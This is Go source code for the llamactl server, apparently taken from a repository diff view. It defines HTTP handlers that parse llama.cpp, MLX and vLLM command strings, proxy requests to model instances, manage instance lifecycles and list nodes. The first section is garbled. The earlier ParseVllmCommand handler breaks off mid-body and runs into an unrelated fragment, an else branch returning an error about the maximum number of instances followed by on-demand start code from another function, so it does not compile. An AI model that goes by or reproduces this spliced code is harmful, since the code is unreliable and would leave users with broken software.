	// reject writes a JSON error reply with the given HTTP status.
	reject := func(w http.ResponseWriter, status int, code, details string) {
		w.Header().Set("Content-Type", "application/json")
		w.WriteHeader(status)
		_ = json.NewEncoder(w).Encode(failure{Error: code, Details: details})
	}

	// The handler decodes a ParseCommandRequest, parses its command with the
	// llama.cpp parser and replies with the resulting instance options.
	return func(w http.ResponseWriter, r *http.Request) {
		var payload ParseCommandRequest
		decodeErr := json.NewDecoder(r.Body).Decode(&payload)
		if decodeErr != nil {
			reject(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
			return
		}

		if strings.TrimSpace(payload.Command) == "" {
			reject(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
			return
		}

		parsed, parseErr := llamacpp.ParseLlamaCommand(payload.Command)
		if parseErr != nil {
			reject(w, http.StatusBadRequest, "parse_error", parseErr.Error())
			return
		}

		result := &instance.CreateInstanceOptions{
			BackendType:        backends.BackendTypeLlamaCpp,
			LlamaServerOptions: parsed,
		}

		w.Header().Set("Content-Type", "application/json")
		if encodeErr := json.NewEncoder(w).Encode(result); encodeErr != nil {
			reject(w, http.StatusInternalServerError, "encode_error", encodeErr.Error())
		}
	}
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
	// failure is the JSON body sent for every error reply of this handler.
	type failure struct {
		Error   string `json:"error"`
		Details string `json:"details,omitempty"`
	}

	// reject writes a JSON error reply with the given HTTP status.
	reject := func(w http.ResponseWriter, status int, code, details string) {
		w.Header().Set("Content-Type", "application/json")
		w.WriteHeader(status)
		_ = json.NewEncoder(w).Encode(failure{Error: code, Details: details})
	}

	// The handler decodes a ParseCommandRequest, parses its command with the
	// MLX parser and replies with the resulting instance options.
	return func(w http.ResponseWriter, r *http.Request) {
		var payload ParseCommandRequest
		decodeErr := json.NewDecoder(r.Body).Decode(&payload)
		if decodeErr != nil {
			reject(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
			return
		}

		if strings.TrimSpace(payload.Command) == "" {
			reject(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
			return
		}

		parsed, parseErr := mlx.ParseMlxCommand(payload.Command)
		if parseErr != nil {
			reject(w, http.StatusBadRequest, "parse_error", parseErr.Error())
			return
		}

		// mlx_lm is the only backend type produced by this handler.
		result := &instance.CreateInstanceOptions{
			BackendType:      backends.BackendTypeMlxLm,
			MlxServerOptions: parsed,
		}

		w.Header().Set("Content-Type", "application/json")
		if encodeErr := json.NewEncoder(w).Encode(result); encodeErr != nil {
			reject(w, http.StatusInternalServerError, "encode_error", encodeErr.Error())
		}
	}
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
backendType := backends.BackendTypeVllm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
VllmServerOptions: vllmOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
} else {
return fmt.Errorf("cannot start instance, maximum number of instances reached")
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(inst.Name); err != nil {
return fmt.Errorf("failed to start instance: %w", err)
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil {
return fmt.Errorf("instance failed to become healthy: %w", err)
}
return nil
}

View File

@@ -0,0 +1,302 @@
package server
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"net/http"
"os/exec"
"strings"
)
// ParseCommandRequest is the JSON request body decoded by parseHelper for the
// backend command-parsing handlers.
type ParseCommandRequest struct {
	// Command is the command string to parse; it is read from the "command" JSON key.
Command string `json:"command"`
}
// validateLlamaCppInstance resolves the instance referenced by the request and
// returns it only when its backend type is llama.cpp; otherwise it returns an
// error describing why the instance was rejected.
func (h *Handler) validateLlamaCppInstance(r *http.Request) (*instance.Instance, error) {
	candidate, lookupErr := h.getInstance(r)
	if lookupErr != nil {
		return nil, fmt.Errorf("invalid instance: %w", lookupErr)
	}

	opts := candidate.GetOptions()
	switch {
	case opts == nil:
		return nil, fmt.Errorf("cannot obtain instance's options")
	case opts.BackendOptions.BackendType != backends.BackendTypeLlamaCpp:
		return nil, fmt.Errorf("instance is not a llama.cpp server")
	}

	return candidate, nil
}
// stripLlamaCppPrefix rewrites r.URL.Path in place, dropping a leading
// "/llama-cpp/<instName>" segment when the path starts with it.
func (h *Handler) stripLlamaCppPrefix(r *http.Request, instName string) {
	routePrefix := "/llama-cpp/" + instName
	trimmed := strings.TrimPrefix(r.URL.Path, routePrefix)
	r.URL.Path = trimmed
}
// LlamaCppUIProxy godoc
// @Summary Proxy requests to llama.cpp UI for the instance
// @Description Proxies requests to the llama.cpp UI for the specified instance
// @Tags Llama.cpp
// @Security ApiKeyAuth
// @Produce html
// @Param name path string true "Instance Name"
// @Success 200 {string} string "Proxied HTML response"
// @Failure 400 {string} string "Invalid instance"
// @Failure 500 {string} string "Internal Server Error"
// @Router /llama-cpp/{name}/ [get]
func (h *Handler) LlamaCppUIProxy() http.HandlerFunc {
	// The handler serves the llama.cpp UI of the requested instance. Local
	// instances must already be running and have the "/llama-cpp/<name>"
	// prefix stripped from the path before the request is handed over.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		target, validateErr := h.validateLlamaCppInstance(r)
		if validateErr != nil {
			writeError(w, http.StatusBadRequest, "invalid instance", validateErr.Error())
			return
		}

		// Reject only when the instance is neither remote nor running.
		if !(target.IsRemote() || target.IsRunning()) {
			writeError(w, http.StatusBadRequest, "instance is not running", "Instance is not running")
			return
		}

		if remote := target.IsRemote(); !remote {
			h.stripLlamaCppPrefix(r, target.Name)
		}

		// Delegate to the instance's ServeHTTP, which tracks inflight requests
		// and handles the shutting down state. Per the original comment, the
		// response has already been written when an error is returned.
		if serveErr := target.ServeHTTP(w, r); serveErr != nil {
			return
		}
	})
}
// LlamaCppProxy godoc
// @Summary Proxy requests to llama.cpp server instance
// @Description Proxies requests to the specified llama.cpp server instance, starting it on-demand if configured
// @Tags Llama.cpp
// @Security ApiKeyAuth
// @Produce json
// @Param name path string true "Instance Name"
// @Success 200 {object} map[string]any "Proxied response"
// @Failure 400 {string} string "Invalid instance"
// @Failure 500 {string} string "Internal Server Error"
// @Router /llama-cpp/{name}/props [get]
// @Router /llama-cpp/{name}/slots [get]
// @Router /llama-cpp/{name}/apply-template [post]
// @Router /llama-cpp/{name}/completion [post]
// @Router /llama-cpp/{name}/detokenize [post]
// @Router /llama-cpp/{name}/embeddings [post]
// @Router /llama-cpp/{name}/infill [post]
// @Router /llama-cpp/{name}/metrics [post]
// @Router /llama-cpp/{name}/props [post]
// @Router /llama-cpp/{name}/reranking [post]
// @Router /llama-cpp/{name}/tokenize [post]
func (h *Handler) LlamaCppProxy() http.HandlerFunc {
	// The handler proxies a llama.cpp API call to the requested instance. A
	// local instance that is not running goes through ensureInstanceRunning
	// first; an instance that is shutting down is refused with 503.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		target, validateErr := h.validateLlamaCppInstance(r)
		if validateErr != nil {
			writeError(w, http.StatusBadRequest, "invalid instance", validateErr.Error())
			return
		}

		// Refuse early so a shutting-down instance never reaches the autostart logic.
		if status := target.GetStatus(); status == instance.ShuttingDown {
			writeError(w, http.StatusServiceUnavailable, "instance_shutting_down", "Instance is shutting down")
			return
		}

		// Only local, stopped instances need to be brought up.
		if !(target.IsRemote() || target.IsRunning()) {
			if startErr := h.ensureInstanceRunning(target); startErr != nil {
				writeError(w, http.StatusInternalServerError, "instance start failed", startErr.Error())
				return
			}
		}

		if remote := target.IsRemote(); !remote {
			h.stripLlamaCppPrefix(r, target.Name)
		}

		// Delegate to the instance's ServeHTTP, which tracks inflight requests
		// and handles the shutting down state. Per the original comment, the
		// response has already been written when an error is returned.
		if serveErr := target.ServeHTTP(w, r); serveErr != nil {
			return
		}
	})
}
// parseHelper decodes a ParseCommandRequest from the request body and feeds its
// command to backend.ParseCommand. On success it returns the parsed options and
// true. On any failure it writes a 400 JSON error to w and returns (nil, false),
// so callers must not write a response themselves in that case.
func parseHelper(w http.ResponseWriter, r *http.Request, backend interface {
	ParseCommand(string) (any, error)
}) (any, bool) {
	var payload ParseCommandRequest
	decodeErr := json.NewDecoder(r.Body).Decode(&payload)

	switch {
	case decodeErr != nil:
		writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
		return nil, false
	case strings.TrimSpace(payload.Command) == "":
		writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
		return nil, false
	}

	// Hand the raw command string to the backend-specific parser.
	result, parseErr := backend.ParseCommand(payload.Command)
	if parseErr != nil {
		writeError(w, http.StatusBadRequest, "parse_error", parseErr.Error())
		return nil, false
	}

	return result, true
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags Backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.Options "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
	// The handler parses a llama-server command via parseHelper and replies
	// with instance options whose backend type is llama.cpp.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		parsed, succeeded := parseHelper(w, r, &backends.LlamaServerOptions{})
		if !succeeded {
			// parseHelper has already written the error response.
			return
		}

		backendOptions := backends.Options{
			BackendType:        backends.BackendTypeLlamaCpp,
			LlamaServerOptions: parsed.(*backends.LlamaServerOptions),
		}
		writeJSON(w, http.StatusOK, &instance.Options{BackendOptions: backendOptions})
	})
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags Backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.Options "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /api/v1/backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
	// The handler parses an mlx_lm.server command via parseHelper and replies
	// with instance options whose backend type is MLX-LM.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		parsed, succeeded := parseHelper(w, r, &backends.MlxServerOptions{})
		if !succeeded {
			// parseHelper has already written the error response.
			return
		}

		backendOptions := backends.Options{
			BackendType:      backends.BackendTypeMlxLm,
			MlxServerOptions: parsed.(*backends.MlxServerOptions),
		}
		writeJSON(w, http.StatusOK, &instance.Options{BackendOptions: backendOptions})
	})
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags Backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.Options "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /api/v1/backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
	// The handler parses a vllm serve command via parseHelper and replies
	// with instance options whose backend type is vLLM.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		parsed, succeeded := parseHelper(w, r, &backends.VllmServerOptions{})
		if !succeeded {
			// parseHelper has already written the error response.
			return
		}

		backendOptions := backends.Options{
			BackendType:       backends.BackendTypeVllm,
			VllmServerOptions: parsed.(*backends.VllmServerOptions),
		}
		writeJSON(w, http.StatusOK, &instance.Options{BackendOptions: backendOptions})
	})
}
// executeLlamaServerCommand returns a handler that runs "llama-server <flag>"
// and writes its combined stdout/stderr as plain text. When the command fails,
// the handler answers 500 with errorMsg followed by the underlying error.
//
// The process is bound to the request context, so it is killed if the client
// disconnects or the request is cancelled instead of being left running.
func (h *Handler) executeLlamaServerCommand(flag, errorMsg string) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		cmd := exec.CommandContext(r.Context(), "llama-server", flag)
		output, err := cmd.CombinedOutput()
		if err != nil {
			writeError(w, http.StatusInternalServerError, "command failed", errorMsg+": "+err.Error())
			return
		}
		writeText(w, http.StatusOK, string(output))
	}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags Backends
// @Security ApiKeyAuth
// @Produce text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
	// Flag passed to llama-server and the message used when the command fails.
	const (
		helpFlag   = "--help"
		failureMsg = "Failed to get help"
	)
	return h.executeLlamaServerCommand(helpFlag, failureMsg)
}
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags Backends
// @Security ApiKeyAuth
// @Produce text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
	// Flag passed to llama-server and the message used when the command fails.
	const (
		versionFlag = "--version"
		failureMsg  = "Failed to get version"
	)
	return h.executeLlamaServerCommand(versionFlag, failureMsg)
}
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags Backends
// @Security ApiKeyAuth
// @Produce text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
	// Flag passed to llama-server and the message used when the command fails.
	const (
		listDevicesFlag = "--list-devices"
		failureMsg      = "Failed to list devices"
	)
	return h.executeLlamaServerCommand(listDevicesFlag, failureMsg)
}

View File

@@ -0,0 +1,352 @@
package server
import (
	"encoding/json"
	"errors"
	"fmt"
	"llamactl/pkg/instance"
	"llamactl/pkg/manager"
	"llamactl/pkg/validation"
	"net/http"
	"strconv"
	"strings"

	"github.com/go-chi/chi/v5"
)
// ListInstances godoc
// @Summary List all instances
// @Description Returns a list of all instances managed by the server
// @Tags Instances
// @Security ApiKeyAuth
// @Produce json
// @Success 200 {array} instance.Instance "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
	// The handler replies with every instance returned by the instance manager
	// as JSON, or with a 500 error when listing fails.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		all, listErr := h.InstanceManager.ListInstances()
		if listErr == nil {
			writeJSON(w, http.StatusOK, all)
			return
		}
		writeError(w, http.StatusInternalServerError, "list_failed", "Failed to list instances: "+listErr.Error())
	})
}
// CreateInstance godoc
// @Summary Create and start a new instance
// @Description Creates a new instance with the provided configuration options
// @Tags Instances
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param name path string true "Instance Name"
// @Param options body instance.Options true "Instance configuration options"
// @Success 201 {object} instance.Instance "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [post]
func (h *Handler) CreateInstance() http.HandlerFunc {
	// The handler validates the "name" URL parameter, decodes the instance
	// options from the JSON body and asks the manager to create the instance.
	// Success is reported with 201 and the created instance.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
		if nameErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
			return
		}

		requested := new(instance.Options)
		if decodeErr := json.NewDecoder(r.Body).Decode(requested); decodeErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
			return
		}

		created, createErr := h.InstanceManager.CreateInstance(instanceName, requested)
		if createErr != nil {
			writeError(w, http.StatusInternalServerError, "create_failed", "Failed to create instance: "+createErr.Error())
			return
		}

		writeJSON(w, http.StatusCreated, created)
	})
}
// GetInstance godoc
// @Summary Get details of a specific instance
// @Description Returns the details of a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produce json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [get]
func (h *Handler) GetInstance() http.HandlerFunc {
	// The handler validates the "name" URL parameter and replies with the
	// matching instance as JSON; both failure modes are reported as 400.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
		if nameErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
			return
		}

		found, lookupErr := h.InstanceManager.GetInstance(instanceName)
		if lookupErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance", lookupErr.Error())
			return
		}

		writeJSON(w, http.StatusOK, found)
	})
}
// UpdateInstance godoc
// @Summary Update an instance's configuration
// @Description Updates the configuration of a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param name path string true "Instance Name"
// @Param options body instance.Options true "Instance configuration options"
// @Success 200 {object} instance.Instance "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [put]
func (h *Handler) UpdateInstance() http.HandlerFunc {
	// The handler validates the "name" URL parameter, decodes the new options
	// from the JSON body and asks the manager to apply them to the instance.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
		if nameErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
			return
		}

		requested := new(instance.Options)
		if decodeErr := json.NewDecoder(r.Body).Decode(requested); decodeErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_request", "Invalid request body")
			return
		}

		updated, updateErr := h.InstanceManager.UpdateInstance(instanceName, requested)
		if updateErr != nil {
			writeError(w, http.StatusInternalServerError, "update_failed", "Failed to update instance: "+updateErr.Error())
			return
		}

		writeJSON(w, http.StatusOK, updated)
	})
}
// StartInstance godoc
// @Summary Start a stopped instance
// @Description Starts a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produce json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/start [post]
func (h *Handler) StartInstance() http.HandlerFunc {
	// The handler validates the "name" URL parameter and asks the manager to
	// start the instance. A manager.MaxRunningInstancesError is reported as
	// 409 Conflict; any other start failure is reported as 500.
	return func(w http.ResponseWriter, r *http.Request) {
		name := chi.URLParam(r, "name")
		validatedName, err := validation.ValidateInstanceName(name)
		if err != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
			return
		}

		inst, err := h.InstanceManager.StartInstance(validatedName)
		if err != nil {
			// Check if error is due to maximum running instances limit.
			// errors.As also matches when the error has been wrapped (e.g. with
			// fmt.Errorf("...: %w", err)), which a bare type assertion misses.
			var maxErr manager.MaxRunningInstancesError
			if errors.As(err, &maxErr) {
				writeError(w, http.StatusConflict, "max_instances_reached", err.Error())
				return
			}

			writeError(w, http.StatusInternalServerError, "start_failed", "Failed to start instance: "+err.Error())
			return
		}

		writeJSON(w, http.StatusOK, inst)
	}
}
// StopInstance godoc
// @Summary Stop a running instance
// @Description Stops a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produce json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/stop [post]
func (h *Handler) StopInstance() http.HandlerFunc {
	// The handler validates the "name" URL parameter, asks the manager to stop
	// the instance and replies with the value the manager returns.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
		if nameErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
			return
		}

		stopped, stopErr := h.InstanceManager.StopInstance(instanceName)
		if stopErr != nil {
			writeError(w, http.StatusInternalServerError, "stop_failed", "Failed to stop instance: "+stopErr.Error())
			return
		}

		writeJSON(w, http.StatusOK, stopped)
	})
}
// RestartInstance godoc
// @Summary Restart a running instance
// @Description Restarts a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Produce json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Instance "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/restart [post]
func (h *Handler) RestartInstance() http.HandlerFunc {
	// The handler validates the "name" URL parameter, asks the manager to
	// restart the instance and replies with the value the manager returns.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
		if nameErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
			return
		}

		restarted, restartErr := h.InstanceManager.RestartInstance(instanceName)
		if restartErr != nil {
			writeError(w, http.StatusInternalServerError, "restart_failed", "Failed to restart instance: "+restartErr.Error())
			return
		}

		writeJSON(w, http.StatusOK, restarted)
	})
}
// DeleteInstance godoc
// @Summary Delete an instance
// @Description Stops and removes a specific instance by name
// @Tags Instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 204 "No Content"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name} [delete]
func (h *Handler) DeleteInstance() http.HandlerFunc {
	// The handler validates the "name" URL parameter and asks the manager to
	// delete the instance; success is reported as 204 with no body.
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		instanceName, nameErr := validation.ValidateInstanceName(chi.URLParam(r, "name"))
		if nameErr != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance_name", nameErr.Error())
			return
		}

		deleteErr := h.InstanceManager.DeleteInstance(instanceName)
		if deleteErr != nil {
			writeError(w, http.StatusInternalServerError, "delete_failed", "Failed to delete instance: "+deleteErr.Error())
			return
		}

		w.WriteHeader(http.StatusNoContent)
	})
}
// GetInstanceLogs godoc
// @Summary Get logs from a specific instance
// @Description Returns the logs from a specific instance by name with optional line limit
// @Tags Instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Param lines query string false "Number of lines to retrieve (default: all lines)"
// @Produce text/plain
// @Success 200 {string} string "Instance logs"
// @Failure 400 {string} string "Invalid name format or lines parameter"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/instances/{name}/logs [get]
func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_instance_name", err.Error())
return
}
lines := r.URL.Query().Get("lines")
numLines := -1 // Default to all lines
if lines != "" {
parsedLines, err := strconv.Atoi(lines)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid_parameter", "Invalid lines parameter: "+err.Error())
return
}
numLines = parsedLines
}
// Use the instance manager which handles both local and remote instances
logs, err := h.InstanceManager.GetInstanceLogs(validatedName, numLines)
if err != nil {
writeError(w, http.StatusInternalServerError, "logs_failed", "Failed to get logs: "+err.Error())
return
}
writeText(w, http.StatusOK, logs)
}
}
// InstanceProxy godoc
// @Summary Proxy requests to a specific instance, does not autostart instance if stopped
// @Description Forwards HTTP requests to the llama-server instance running on a specific port
// @Tags Instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 200 "Request successfully proxied to instance"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Failure 503 {string} string "Instance is not running"
// @Router /api/v1/instances/{name}/proxy [get]
// @Router /api/v1/instances/{name}/proxy [post]
func (h *Handler) InstanceProxy() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		inst, err := h.getInstance(r)
		if err != nil {
			writeError(w, http.StatusBadRequest, "invalid_instance", err.Error())
			return
		}

		// This endpoint never auto-starts an instance: a stopped one is reported as unavailable.
		if !inst.IsRunning() {
			writeError(w, http.StatusServiceUnavailable, "instance_not_running", "Instance is not running")
			return
		}

		if !inst.IsRemote() {
			// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL
			prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", inst.Name)
			r.URL.Path = strings.TrimPrefix(r.URL.Path, prefix)
		}

		// Set forwarded headers. For incoming server requests net/http promotes
		// the Host header to r.Host and removes it from r.Header, so
		// r.Header.Get("Host") is always empty here; r.Host carries the real value.
		r.Header.Set("X-Forwarded-Host", r.Host)
		// NOTE(review): the protocol is hard-coded to "http" — confirm whether
		// TLS-terminated deployments should forward "https" instead.
		r.Header.Set("X-Forwarded-Proto", "http")

		// Use instance's ServeHTTP which tracks inflight requests and handles shutting down state.
		// On error the response has already been written by ServeHTTP, so the
		// returned error needs no further handling here.
		_ = inst.ServeHTTP(w, r)
	}
}

View File

@@ -0,0 +1,70 @@
package server
import (
"net/http"
"github.com/go-chi/chi/v5"
)
// NodeResponse represents a node configuration in API responses.
// It is the sanitized shape returned by the node handlers in this file:
// only the address is copied out of the server's node configuration.
type NodeResponse struct {
// Address is the node's configured address, serialized under the "address" key.
Address string `json:"address"`
}
// ListNodes godoc
// @Summary List all configured nodes
// @Description Returns a map of all nodes configured in the server (node name -> node config)
// @Tags Nodes
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {object} map[string]NodeResponse "Map of nodes"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/nodes [get]
func (h *Handler) ListNodes() http.HandlerFunc {
	return func(w http.ResponseWriter, _ *http.Request) {
		// Build the sanitized view (name -> NodeResponse) so that only the
		// address of each configured node is exposed.
		sanitized := make(map[string]NodeResponse, len(h.cfg.Nodes))
		for nodeName, nodeCfg := range h.cfg.Nodes {
			sanitized[nodeName] = NodeResponse{Address: nodeCfg.Address}
		}

		writeJSON(w, http.StatusOK, sanitized)
	}
}
// GetNode godoc
// @Summary Get details of a specific node
// @Description Returns the details of a specific node by name
// @Tags Nodes
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Node Name"
// @Success 200 {object} NodeResponse "Node details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 404 {string} string "Node not found"
// @Failure 500 {string} string "Internal Server Error"
// @Router /api/v1/nodes/{name} [get]
func (h *Handler) GetNode() http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		nodeName := chi.URLParam(r, "name")
		if nodeName == "" {
			writeError(w, http.StatusBadRequest, "invalid_request", "Node name cannot be empty")
			return
		}

		// Look the node up in the server configuration; unknown names are a 404.
		nodeCfg, found := h.cfg.Nodes[nodeName]
		if !found {
			writeError(w, http.StatusNotFound, "not_found", "Node not found")
			return
		}

		// Reply with the sanitized shape, which carries only the address.
		writeJSON(w, http.StatusOK, NodeResponse{Address: nodeCfg.Address})
	}
}

View File

@@ -0,0 +1,135 @@
package server
import (
"bytes"
"encoding/json"
"io"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"net/http"
)
// OpenAIListInstancesResponse represents the response structure for listing instances (models) in OpenAI-compatible format
type OpenAIListInstancesResponse struct {
// Object names the kind of payload; the OpenAIListInstances handler sets it to "list".
Object string `json:"object"`
// Data holds one OpenAIInstance entry per listed instance.
Data []OpenAIInstance `json:"data"`
}
// OpenAIInstance represents a single instance (model) in OpenAI-compatible format
type OpenAIInstance struct {
// ID is filled with the instance name by the OpenAIListInstances handler.
ID string `json:"id"`
// Object names the kind of entry; the handler sets it to "model".
Object string `json:"object"`
// Created is copied from the instance's Created field.
// NOTE(review): presumably a Unix timestamp — confirm the unit against the instance package.
Created int64 `json:"created"`
// OwnedBy identifies the owner; the handler sets it to "llamactl".
OwnedBy string `json:"owned_by"`
}
// OpenAIListInstances godoc
